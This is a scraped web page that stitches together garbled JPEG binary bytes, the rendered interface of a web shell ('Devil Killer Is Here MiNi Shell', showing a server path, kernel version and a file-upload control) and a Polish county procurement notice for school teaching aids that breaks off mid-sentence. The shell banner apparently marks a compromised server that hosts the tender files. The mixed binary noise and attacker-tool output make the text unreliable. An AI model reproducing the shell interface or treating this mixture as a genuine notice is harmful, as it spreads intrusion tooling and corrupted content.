JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211206/0030004801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa pomocy naukowo - dydaktycznych do realizacji zajęć, zaplanowanych w ramach projektu pn. &#34;Zdolni z Pomorza - powiat sztumski&#34;, współfinansowanego ze środków RPO WP na lata 2014-2020&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Sztumski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192638080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sztum</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">55-267-74-20</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">55-267-74-42</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">organizacyjny@powiatsztumski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatsztumski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa pomocy naukowo - dydaktycznych do realizacji zajęć, zaplanowanych w ramach projektu pn. &#34;Zdolni z Pomorza - powiat sztumski&#34;, współfinansowanego ze środków RPO WP na lata 2014-2020&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-87215d6c-566c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00300048</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003573/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa pomocy naukowo - dydaktycznych do realizacji zajęć, zaplanowanych w ramach projektu pn. &#34;Zdolni z Pomorza - powiat sztumski&#34;, współfinansowanego ze środków RPO WP na lata 2014-2020</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Realizacja projektu nr RPPM.03.02.02-22-0017/16 pn. &#34;Zdolni z Pomorza - powiat sztumski&#34;, współfinansowanego ze środków Osi Priorytetowej 3 Edukacja, Działanie 3.2 Edukacja ogólna, Poddziałanie 3.2.2 Wsparcie ucznia szczególnie uzdolnionego RPO WP na lata 2014-2020 zatwierdzonego uchwałą Nr 979/175/16 Zarządu Województwa Pomorskiego z dnia 27.09.2016 r. z późn. zm.&#34; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sp_sztum <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/sp_sztum</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Oferta oraz przedmiotowe środki dowodowe (wymienione w pkt 3), składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny Wykonawca może złożyć bezpośrednio na dokumencie, który następnie przesyła do systemu (opcja rekomendowana przez platformazakupowa.pl) oraz dodatkowo dla całego pakietu dokumentów w kroku 2 Formularza składania oferty (po kliknięciu w przycisk Przejdź do podsumowania).<br/>2.	Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. Poprzez oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. <br/><br/>3.	Składana Oferta wykonania zamówienia musi zawierać:<br/>1)	Wypełniony Formularz ofertowy, którego wzór stanowi Załącznik nr 1 do SWZ; <br/>2)	Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania, o którym mowa w Rozdziale X pkt 1 SWZ;<br/>3)	Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w Rozdziale XII pkt 1 SWZ (jeżeli występuje);<br/>4)	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w Rozdziale XI pkt 3 SWZ (jeżeli występuje).<br/><br/>4.	Oferta powinna być:<br/>1)	sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>2)	złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem https://platformazakupowa.pl/pn/sp_sztum ,<br/>3)	podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną /upoważnione.<br/>5.	Podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>6.	W przypadku wykorzystania formatu podpisu XAdES zewnętrzny, Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych jest Zarząd Powiatu Sztumskiego z siedzibą ul. Mickiewicza 31, 82-400 Sztum. Pozostałe nasze dane kontaktowe to:<br/>organizacyjny@powiatsztumski.pl; tel. 55 267 74 41;<br/>- dane kontaktowe inspektora ochrony danych to:iod@powiatsztumski.pl lub tel. 55 267 74 21;<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego: „Dostawa pomocy naukowo-dydaktycznych do realizacji zajęć, zaplanowanych w ramach projektu pn. &#34;Zdolni z Pomorza - powiat sztumski&#34;, współfinansowanego ze środków RPO WP na lata 2014-2020”<br/>3) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@fioi.org.<br/>4) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji (art. 275 pkt 1 ustawy PZP).<br/>5) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP<br/>6) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>7) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>8) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>9) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać P-ani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>11) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.272.30.2021.DA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE I – pomoce dydaktyczne do realizacji zajęć matematyczno-fizycznych oraz biologiczno-chemicznych<br/>1. Prawo Boylea-Mariottea - model demonstracyjny Model musi zawierać n/w elementy:<br/>•	metalowa podstawa, na której umieszczona jest strzykawka (średnica cylindra max. 3 cm zaznaczone objętości od 20-65 ml, w odstępach co 5 ml) z tłokiem umocowanym na śrubie z rączką, <br/>•	manometr (średnica max. 8 cm, skala od -1000 hPa do 3000 hPa) zawór odpowietrzający oraz wyświetlacz temperatury,<br/>•	czujnik przy podstawie strzykawki z włącznikiem,<br/>•	zasilanie: bateria typu AA 1,5V<br/>2. Obwody elektryczne - zestaw	Skład zestawu: <br/>•	Amperomierz (0~0,5~1)A – 1 szt. <br/>•	Woltomierz (0~1,5~3)V – 1 szt. <br/>•	Wyłącznik – 3 szt. <br/>•	Rezystor 5Ω/2W – 1 szt. <br/>•	Rezystor 10Ω/2W – 1 szt. <br/>•	Przekaźnik elektromagnetyczny – 1 szt. <br/>•	Opornica suwakowa – 1 szt. <br/>•	Model silnika elektrycznego – 1 szt. <br/>•	Podstawka pod żarówkę – 2 szt. <br/>•	Igła magnetyczna na podstawie – 1 szt. <br/>•	Magnes sztabkowy – 2 szt. <br/>•	Magnes podkowiasty – 1 szt. <br/>•	Opiłki żelazne – 1 szt. <br/>•	Żarówka – 2 szt. <br/>•	Kasetka na baterie 1,5V AA – 1 szt. <br/>•	Komplet przewodów – 1 zestaw <br/>3. Model sklepienia niebieskiego	Minimalne wymiary zestawu:<br/>•	model sklepienia niebieskiego o średnicy minimalnej 30,5 cm,<br/>•	wewnętrzny globus Ziemi o średnicy minimalnej 8,5 cm,<br/>•	materiał: tworzywo sztuczne.<br/>4. Korpus człowieka Model musi zawierać n/w: <br/>•	części ludzkiego ciała tj.: głowa, gałka oczna, mózg, kość szczękowa, płuco, serce, tchawica, przełyk i przepona, wątroba, lewa nerka, prawa nerka, lewe nadnercza, prawe nadnercza, żołądek, jelita, męskie narządy płciowe, kobiece narządy płciowe z płodem, kręgi, krążek międzykręgowy, rdzeń kręgowy, śledziona, kobiecy gruczoł piersiowy, gardło, tułów.<br/>•	model unisex,<br/>•	wysokość modelu: min. 80 cm max.120 cm,<br/>•	materiał: tworzywo sztuczne.<br/>5. Model komórki zwierzęcej	•	trójwymiarowy model demonstracyjny do samodzielnego złożenia,<br/>•	elementy składowe: model komórki, stojak, śruba, podkładka okrągła,<br/>•	materiał: tworzywo sztuczne.<br/>6. Bryły geometryczne - wpisane	•	Skład kompletu - 6 brył geometrycznych:<br/>•	ostrosłup o podstawie czworokąta z wpisaną kulą,<br/>•	ostrosłup o podstawie trójkąta z wpisaną kulą,<br/>•	ostrosłup o podstawie sześciokąta z wpisaną kulą,<br/>•	graniastosłup o podstawie czworokąta z wpisanym ostrosłupem o podstawie czworokąta,<br/>•	graniastosłup o podstawie sześciokąta z wpisanym ostrosłupem o podstawie sześciokąta,<br/>•	graniastosłup o podstawie trójkąta z wpisanym ostrosłupem o podstawie trójkąta,<br/>•	wysokość minimalna - 18 cm,<br/>•	wysokość maksymalna - 20 cm,<br/>•	materiał: tworzywo sztuczne.<br/>7. Bryły geometryczne - wielościany foremne	Skład kompletu - 4 bryły geometryczne:<br/>•	sześcian z wpisanym ośmiościanem,<br/>•	sześcian z zaznaczonymi przekątnymi,<br/>•	czworościan z wpisanym czworościanem,<br/>•	czworościan z zaznaczonymi wysokościami,<br/>•	wysokość minimalna - 18 cm,<br/>•	wysokość maksymalna - 20 cm,<br/>•	materiał: tworzywo sztuczne<br/>8. Nakładka tablicowa suchościeralna - kratka Wymiary:<br/>•	rozmiar gabarytowy planszy: 80 cm x 96 cm, formatowo wpisujący się w skrzydło tradycyjnego szkolnego tryptyku,<br/>•	tył zaopatrzony w taśmy magnetyczne.<br/>9. Nakładka tablicowa suchościeralna - układ współrzędnych	Wymiary:<br/>•	rozmiar gabarytowy planszy: 80 cm x 96 cm, formatowo wpisujący się w skrzydło tradycyjnego szkolnego tryptyku,<br/>•	tył zaopatrzony w taśmy magnetyczne.<br/>10. Multimedialna biblioteka - Paleontologia i kultura	Oprogramowanie do tablicy multimedialnej:<br/>•	możliwość uwypuklenia dowolnej części modelu w celu bardziej kompleksowej prezentacji,<br/>•	Zoom i obrót 3D modeli w celu bardziej szczegółowego widoku,<br/>•	funkcja rozszerzonej rzeczywistości,<br/>•	funkcja ślepej mapy w celu przeanalizowania i przetestowania wiedzy uczniów,<br/>•	narzędzie do wyszukiwania zgodnie z nazwą i słowami kluczowymi,<br/>•	możliwość przełączania poszczególnych wersji językowych i wyświetlenia dwóch języków jednocześnie,<br/>•	funkcja zdjęcia w celu stworzenia nieograniczonej liczby obrazków,<br/>•	możliwość wpisywania własnych uwag do modeli,<br/>•	kompatybilność z MS Office 2013, 2016, 2019 i Office 365 w celu zastosowania modeli w prezentacjach i dokumentach,<br/>•	pełny opis naukowy każdego elementu.<br/>11. Multimedialna biblioteka - fizyka i astronomia <br/>	Oprogramowanie do tablicy multimedialnej:<br/>•	możliwość uwypuklenia dowolnej części modelu w celu bardziej kompleksowej prezentacji,<br/>•	Zoom i obrót 3D modeli w celu bardziej szczegółowego widoku,<br/>•	funkcja rozszerzonej rzeczywistości,<br/>•	funkcja ślepej mapy w celu przeanalizowania i przetestowania wiedzy uczniów,<br/>•	narzędzie do wyszukiwania zgodnie z nazwą i słowami kluczowymi,<br/>•	możliwość przełączania poszczególnych wersji językowych i wyświetlenia dwóch języków jednocześnie,<br/>•	funkcja zdjęcia w celu stworzenia nieograniczonej liczby obrazków,<br/>•	możliwość wpisywania własnych uwag do modeli,<br/>•	kompatybilność z MS Office 2013, 2016, 2019 i Office 365 w celu zastosowania modeli w prezentacjach i dokumentach,<br/>•	pełny opis naukowy każdego elementu.<br/>12. Szkielet człowieka z zaznaczonymi częściami mięśni	Zawartość zestawu: <br/>•	elementy ruchome: żuchwa, kość skroniowa, łokieć, kości nadgarstka, kolano, kość biodrowa,<br/>•	Wysokość szkieletu: min. 170 – maks. 185cm,<br/>•	szkielet osadzony na stojaku metalowym na obrotowych kołach,<br/>•	materiał: tworzywo sztuczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162000-5 - Pomoce naukowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34999400-0 - Modele w skali</p> <p class="mb-0">48520000-9 - Pakiety oprogramowania multimedialnego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>Dla każdej z części:<br/><br/>1)	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/><br/>Nr	Nazwa kryterium	Waga<br/>1	Cena ofertowa brutto	60%<br/>2	Gwarancja	20%<br/>3	Termin wykonania dostawy	20 %<br/><br/>2)	Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/><br/>Nr kryterium	Wzór<br/>1	Cena ofertowa brutto<br/>Liczba punktów = (Cnajniższa/Cof) 60 waga<br/>gdzie:<br/> - C najniższa - najniższa cena spośród wszystkich ofert<br/> - C of - cena podana w ofercie<br/>2	Gwarancja 20 waga<br/>3	Termin wykonania dostawy 20 waga<br/><br/>UWAGA! Pkt 1 ppkt 2<br/>Punkty w kryterium gwarancja zostaną przyznane według następujących zasad:<br/>- okres gwarancji minimum 24 miesiące – oferta otrzyma 0 pkt<br/>- okres gwarancji ponad wymaganie minimum (24 miesięcy) tj. na okres 36 miesięcy (dodatkowo 12 miesięcy) – oferta otrzyma 10 pkt;<br/>- okres gwarancji ponad wymaganie minimum (24 miesięcy) tj. na okres 48 miesięcy (dodatkowo 24 miesiące) – oferta otrzyma 20 pkt;<br/>Jeżeli Wykonawca zaproponuje gwarancję powyżej 48 miesięcy, to Zamawiający przyjmie maksymalny okres gwarancji 48 miesięcy.<br/>Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium gwarancja wynosi 20 punktów.<br/><br/>UWAGA! Pkt 1 ppkt 3<br/>Sposób przyznawania punktów w kryterium Termin wykonania dostawy<br/>- termin wykonania dostawy do 30 dni – Oferta otrzyma 0 pkt<br/>- termin wykonania dostawy do 25 dni – Oferta otrzyma 10 pkt<br/>- termin wykonania dostawy do 20 dni – Oferta otrzyma 15 pkt<br/>- termin wykonania dostawy do 15 dni – Oferta otrzyma 20 pkt<br/><br/>Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium Termin wykonania dostawy wynosi 20 punktów.<br/><br/>2.	Łączna ilość punktów dla badanej oferty będzie liczona wg następującego wzoru:<br/>S = C + G + T<br/>gdzie: S – łączna suma punktów badanej oferty<br/> C – cena ofertowa brutto<br/> G – gwarancja <br/> T – termin wykonania dostawy<br/> <br/>3.	Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i nie podlegających odrzuceniu. Danych z ofert uznanych za nieważne nie bierze się pod uwagę przy obliczaniu punktacji.<br/>4.	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów przy 